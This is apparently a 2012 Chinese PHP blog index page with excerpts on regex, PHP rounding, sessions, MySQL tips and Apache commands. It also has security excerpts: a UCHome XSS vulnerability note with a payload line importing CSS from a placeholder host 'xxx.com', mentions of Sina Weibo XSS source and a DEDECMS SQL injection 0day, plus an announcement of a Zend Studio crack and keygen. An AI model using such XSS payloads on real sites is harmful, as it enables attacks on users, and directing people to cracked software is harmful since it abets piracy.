不灭的焱

革命尚未成功,同志仍须努力

作者:php-note.com  发布于:2012-05-31 22:49  分类:电脑/软件使用  编辑

感谢geekso提供的帮助,获取到了最新Zend Studio 9.0.3正式版注册码与破解文件下载。

Zend Studio 9.0 beta版已经发布有段时间了,官网主要包含以下更新:

1.Git和Github支持

2.云开发部署

3.深度Zend Framework和Zend Server集成

作者:php-note.com  发布于:2012-05-30 19:13  分类:Linux软件安装/优化  编辑
作者:php-note.com  发布于:2012-05-30 17:59  分类:编程基础/Web安全  编辑

CSV其实就是 COMMA SEPARATED VALUE 的缩写,出现在档案总管中的档案类型是「逗号分格」,依计算机原来的设定,如果直接点选该档案,计算机将以EXCEL的模式开启该档案。

作者:php-note.com  发布于:2012-05-30 11:32  分类:Apache/Nginx  编辑

1、查看apache进程:

ps aux | grep httpd | grep -v grep | wc -l

2、查看80端口的tcp连接:

作者:php-note.com  发布于:2012-05-30 10:16  分类:编程基础/Web安全  编辑

新浪微博XSS攻击源代码下载(2012.06.28_sina_XSS.txt)

作者:php-note.com  发布于:2012-05-30 01:56  分类:编程基础/Web安全  编辑

0x01. XSS获取明文密码的多种方式

我已经感受到Web潮流带来的巨大革新,尤其是最近HTML5越来越火。浏览器们在客户端瓜分着这个Web OS,只要是对用户体验好的功能,浏览器之间就会互相学习,然后去实现,但是实现总是存在一些差异,有些差异是用户体验上的,有些则可能带来安全问题。

作者:php-note.com  发布于:2012-05-30 01:05  分类:PHP基础  编辑

9. 单词边界

元字符<<\b>>也是一种对位置进行匹配的“锚”。这种匹配是0长度匹配。

有4种位置被认为是“单词边界”:

1) 在字符串的第一个字符前的位置(如果字符串的第一个字符是一个“单词字符”)

2) 在字符串的最后一个字符后的位置(如果字符串的最后一个字符是一个“单词字符”)

3) 在一个“单词字符”和“非单词字符”之间,其中“非单词字符”紧跟在“单词字符”之后

4) 在一个“非单词字符”和“单词字符”之间,其中“单词字符”紧跟在“非单词字符”后面

作者:php-note.com  发布于:2012-05-30 01:02  分类:PHP基础  编辑

1.什么是正则表达式

基本说来,正则表达式是一种用来描述一定数量文本的模式。Regex代表Regular Express。本文将用<<regex>>来表示一段具体的正则表达式。

一段文本就是最基本的模式,简单的匹配相同的文本。

2.不同的正则表达式引擎

正则表达式引擎是一种可以处理正则表达式的软件。通常,引擎是更大的应用程序的一部分。在软件世界,不同的正则表达式并不互相兼容。本教程会集中讨论Perl 5 类型的引擎,因为这种引擎是应用最广泛的引擎。同时我们也会提到一些和其他引擎的区别。许多近代的引擎都很类似,但不完全一样。例如.NET正则库,JDK正则包。

作者:php-note.com  发布于:2012-05-29 23:04  分类:编程基础/Web安全  编辑

发布时间2010-09-03

影响版本uchome 2.0

漏洞描述看源码分析的,出错位置较敏感,而且基本没有利用限制,个人主页自定义风格时,可@import外部css文件

测试方法

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

作者:php-note.com  发布于:2012-05-29 23:03  分类:编程基础/Web安全  编辑

利用条件:开启注册&&开启投稿

方法 :注册会员 -> 发表文章:内容输入

<style>@import 'http://xxx.com/xss.css';</style>
作者:php-note.com  发布于:2012-05-29 15:25  分类:PHP基础  编辑

PHP保留两位小数例子 四舍五入

<?php
/** 1.number_format */
$number = 1234.5678;
$nombre_format_francais = number_format($number, 2, ',', ' '); // 1234,57
$english_format_number = number_format($number, 2, '.', '');   // 1234.57(我一般用这个)

/** 2.round */
$number = 1234.5678;
echo round($number ,2); //1234.57

/** 3.sprintf */
$formatted = sprintf ("%s有¥%01.2f。", $name, $money);
echo $formatted; //张三有¥123.10。
?>
作者:php-note.com  发布于:2012-05-27 23:19  分类:编程基础/Web安全  编辑

作者:php-note.com  发布于:2012-05-27 12:30  分类:PHP基础  编辑

http协议是WEB服务器与客户端(浏览器)相互通信的协议,它是一种无状态协议。所谓无 状态,指的是不会维护http请求数据,http请求是独立的,不持久的。而越来越复杂的WEB应用,需要保存一些用户状态信息。这时候,Session 这种方案应需而生。PHP从4.1开始支持Session管理。

作者:php-note.com  发布于:2012-05-27 09:46  分类:编程基础/Web安全  编辑

1、选取最适用的字段属性

2、使用连接(JOIN)来代替子查询(Sub-Queries)

3、使用联合(UNION)来代替手动创建的临时表

4、事务

5、锁定表

6、使用外键

7、使用索引

8、优化的查询语句

作者:php-note.com  发布于:2012-05-26 19:34  分类:PHP基础  编辑

+++ 探讨(一)+++++++++++++++++++++++++++++++++++++++

很多人都认为global和$GLOBALS[]只是写法上面的差别,其实不然。

根据官方的解释是

  • $GLOBALS['var'] 是外部的全局变量$var本身。
  • global $var 是外部$var的同名引用或者指针。(错误:是个别名引用而已,非指针!!!)
作者:php-note.com  发布于:2012-05-26 18:42  分类:编程基础/Web安全  编辑

在报纸上看到xx又爆出0day漏洞是什么意思?

day漏洞,是已经发现但是官方还没发布补丁的漏洞。

信息安全意义上的0Day是指在安全补丁发布前而被了解和掌握的漏洞信息。

作者:php-note.com  发布于:2012-05-26 18:32  分类:PHP基础  编辑

我们为大家总结的PHP include作用域的问题包括:PHP include 变量作用域和函数的作用域等方面的问题。希望对大家有所帮助。

很多程序员在使用PHP语言进行实际编程时,通常只会关注PHP函数能实现什么功能,但是都不会去深入的了解这个函数的具体含义及隐含的问题。我们今天就为大家介绍PHP include作用域的相关问题。

作者:php-note.com  发布于:2012-05-26 18:05  分类:编程基础/Web安全  编辑

4月29日消息:国内安全研究团队“知道创宇”称截获到最新DEDECMS SQL注入0day,DEDECMS官网目前提供下载的最新版5.7也受影响,截止本告警发出时官方尚未给出补丁或解决方案,此漏洞利用简单且dedecms安装之后默认即开启漏洞模块。

知道创宇给出三种临时解决方案:

作者:php-note.com  发布于:2012-05-26 18:04  分类:PHP基础  编辑
作者:php-note.com  发布于:2012-05-26 17:05  分类:PHP基础  编辑

PHP 中的每个变量都有一个针对它的作用域,它是指可以在其中访问变量(从而访问它的值)的一个领域。对于初学者来说,变量的作用域是它们所驻留的页面。因此, 如果你定义了 $var,页面余下部分就可以访问 $var,但是,其它页面一般不能访问它(除非使用特殊的变量)。

因为包含文件像它们是原始(包含)脚本的一部分那样工作,所以在 include() 那一行之前定义的变量可供包含文件使用。此外,包含文件内定义的变量可供 include() 那一行之后的父(包含)脚本使用。